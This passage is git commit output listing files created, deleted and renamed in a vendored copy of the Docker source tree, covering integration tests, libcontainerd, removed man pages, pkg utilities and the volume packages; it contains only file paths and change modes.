 create mode 100644 vendor/github.com/docker/docker/integration/image/import_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/image/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/image/remove_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/image/tag_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/container/container.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/container/exec.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/container/ops.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/container/states.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/network/network.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/network/ops.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/requirement/requirement.go
 create mode 100644 vendor/github.com/docker/docker/integration/internal/swarm/service.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/delete_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/helpers.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/network/service_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/main_test.go
 rename vendor/github.com/docker/docker/{integration-cli/docker_cli_external_graphdriver_unix_test.go => integration/plugin/graphdriver/external_test.go} (50%)
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/pkg_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/secret/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/secret/secret_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/service/create_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/service/inspect_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/service/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/service/network_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/service/plugin_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/session/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/session/session_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/event_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/info_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/info_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/login_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/system/version_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/ca.pem
 create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/client-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem
 create mode 100644 vendor/github.com/docker/docker/integration/testdata/https/server-key.pem
 create mode 100644 vendor/github.com/docker/docker/integration/volume/main_test.go
 create mode 100644 vendor/github.com/docker/docker/integration/volume/volume_test.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/config.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/container.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/node.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/ops.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/plugin.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/secret.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/service.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/daemon/swarm.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/environment/clean.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/environment/environment.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/environment/protect.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/fakecontext/context.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/fakestorage/storage.go
 rename vendor/github.com/docker/docker/{integration-cli => internal/test}/fixtures/load/frozen.go (60%)
 create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/helper.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/registry/ops.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/registry/registry_mock.go
 rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe.go (91%)
 rename vendor/github.com/docker/docker/{integration-cli => internal/test/request}/npipe_windows.go (91%)
 create mode 100644 vendor/github.com/docker/docker/internal/test/request/ops.go
 create mode 100644 vendor/github.com/docker/docker/internal/test/request/request.go
 create mode 100644 vendor/github.com/docker/docker/internal/testutil/helpers.go
 create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils.go
 create mode 100644 vendor/github.com/docker/docker/internal/testutil/stringutils_test.go
 create mode 100644 vendor/github.com/docker/docker/layer/filestore_unix.go
 create mode 100644 vendor/github.com/docker/docker/layer/filestore_windows.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_local_windows.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/errors.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go
 rename vendor/github.com/docker/docker/libcontainerd/{queue_unix.go => queue.go} (70%)
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_test.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go
 create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_local.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le
 delete mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x
 delete mode 100644 vendor/github.com/docker/docker/man/README.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-create.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-diff.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-rename.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-restart.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/docker.1.md
 delete mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md
 delete mode 100644 vendor/github.com/docker/docker/man/generate.go
 delete mode 100755 vendor/github.com/docker/docker/man/generate.sh
 delete mode 100644 vendor/github.com/docker/docker/man/glide.lock
 delete mode 100644 vendor/github.com/docker/docker/man/glide.yaml
 delete mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh
 rename vendor/github.com/docker/docker/oci/{defaults_linux.go => defaults.go} (58%)
 delete mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go
 create mode 100644 vendor/github.com/docker/docker/opts/address_pools.go
 create mode 100644 vendor/github.com/docker/docker/opts/address_pools_test.go
 create mode 100644 vendor/github.com/docker/docker/opts/env.go
 create mode 100644 vendor/github.com/docker/docker/opts/env_test.go
 delete mode 100644 vendor/github.com/docker/docker/opts/mount.go
 delete mode 100644 vendor/github.com/docker/docker/opts/mount_test.go
 delete mode 100644 vendor/github.com/docker/docker/opts/port.go
 delete mode 100644 vendor/github.com/docker/docker/opts/port_test.go
 rename vendor/github.com/docker/docker/{runconfig => }/opts/runtime.go (97%)
 delete mode 100644 vendor/github.com/docker/docker/opts/secret.go
 delete mode 100644 vendor/github.com/docker/docker/opts/secret_test.go
 rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit.go (65%)
 rename vendor/github.com/docker/docker/{runconfig => }/opts/ulimit_test.go (94%)
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/archiver.go
 create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs.go
 create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go
 rename vendor/github.com/docker/docker/pkg/devicemapper/{devmapper_wrapper_deferred_remove.go => devmapper_wrapper_dynamic_deferred_remove.go} (75%)
 create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go
 create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_others.go
 rename vendor/github.com/docker/docker/pkg/homedir/{homedir.go => homedir_unix.go} (75%)
 create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/random/random.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/testfiles/main.go
 create mode 100644 vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go
 create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md
 delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/init.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/init_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/init_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/lcow_windows.go
 rename vendor/github.com/docker/docker/pkg/system/{lstat.go => lstat_unix.go} (84%)
 delete mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/path.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go
 rename vendor/github.com/docker/docker/{utils => pkg/system}/process_unix.go (50%)
 create mode 100644 vendor/github.com/docker/docker/pkg/system/process_windows.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/rm.go
 create mode 100644 vendor/github.com/docker/docker/pkg/system/rm_test.go
 rename vendor/github.com/docker/docker/pkg/system/{stat.go => stat_unix.go} (63%)
 delete mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/proxy.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/proxy_test.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/tc.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/term_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_bsd.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
 create mode 100644 vendor/github.com/docker/docker/pkg/term/winsize.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/pkg.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
 delete mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
 create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/plugin/errors.go
 create mode 100644 vendor/github.com/docker/docker/plugin/events.go
 create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go
 create mode 100644 vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager_linux_test.go
 delete mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go
 create mode 100644 vendor/github.com/docker/docker/plugin/manager_test.go
 rename vendor/github.com/docker/docker/project/{CONTRIBUTORS.md => CONTRIBUTING.md} (100%)
 delete mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md
 create mode 100644 vendor/github.com/docker/docker/reference/errors.go
 delete mode 100644 vendor/github.com/docker/docker/reference/reference.go
 delete mode 100644 vendor/github.com/docker/docker/reference/reference_test.go
 create mode 100644 vendor/github.com/docker/docker/registry/errors.go
 rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader.go (62%)
 rename vendor/github.com/docker/docker/{pkg/httputils => registry/resumable}/resumablerequestreader_test.go (68%)
 create mode 100644 vendor/github.com/docker/docker/reports/2017-05-01.md
 create mode 100644 vendor/github.com/docker/docker/reports/2017-05-08.md
 create mode 100644 vendor/github.com/docker/docker/reports/2017-05-15.md
 create mode 100644 vendor/github.com/docker/docker/reports/2017-06-05.md
 create mode 100644 vendor/github.com/docker/docker/reports/2017-06-12.md
 create mode 100644 vendor/github.com/docker/docker/reports/2017-06-26.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-01.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-08.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-15.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-22.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-05-29.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-05.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-12.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-06-26.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-07-10.md
 create mode 100644 vendor/github.com/docker/docker/reports/builder/2017-07-17.md
 delete mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
 create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go
 delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env
 delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env
 delete mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
 delete mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
 delete mode 100644 vendor/github.com/docker/docker/utils/debug.go
 delete mode 100644 vendor/github.com/docker/docker/utils/process_windows.go
 delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go
 delete mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go
 delete mode 100644 vendor/github.com/docker/docker/utils/utils.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/lcow_parser.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/linux_parser.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/mounts.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/parser.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/parser_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/validate_test.go
 rename vendor/github.com/docker/docker/volume/{validate_test_unix.go => mounts/validate_unix_test.go} (57%)
 rename vendor/github.com/docker/docker/volume/{validate_test_windows.go => mounts/validate_windows_test.go} (52%)
 rename vendor/github.com/docker/docker/volume/{ => mounts}/volume_copy.go (73%)
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_unix.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/volume_windows.go
 create mode 100644 vendor/github.com/docker/docker/volume/mounts/windows_parser.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/by.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/convert.go
 rename vendor/github.com/docker/docker/volume/{store => service}/db.go (84%)
 create mode 100644 vendor/github.com/docker/docker/volume/service/db_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/default_driver_stubs.go
 rename vendor/github.com/docker/docker/volume/{store => service}/errors.go (65%)
 create mode 100644 vendor/github.com/docker/docker/volume/service/opts/opts.go
 rename vendor/github.com/docker/docker/volume/{store => service}/restore.go (85%)
 create mode 100644 vendor/github.com/docker/docker/volume/service/restore_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/service.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/service_linux_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/service_test.go
 rename vendor/github.com/docker/docker/volume/{store => service}/store.go (51%)
 create mode 100644 vendor/github.com/docker/docker/volume/service/store_test.go
 create mode 100644 vendor/github.com/docker/docker/volume/service/store_unix.go
 rename vendor/github.com/docker/docker/volume/{store => service}/store_windows.go (59%)
 delete mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go
 delete mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go
 delete mode 100644 vendor/github.com/docker/docker/volume/validate.go
 delete mode 100644 vendor/github.com/docker/docker/volume/validate_test.go
 delete mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go
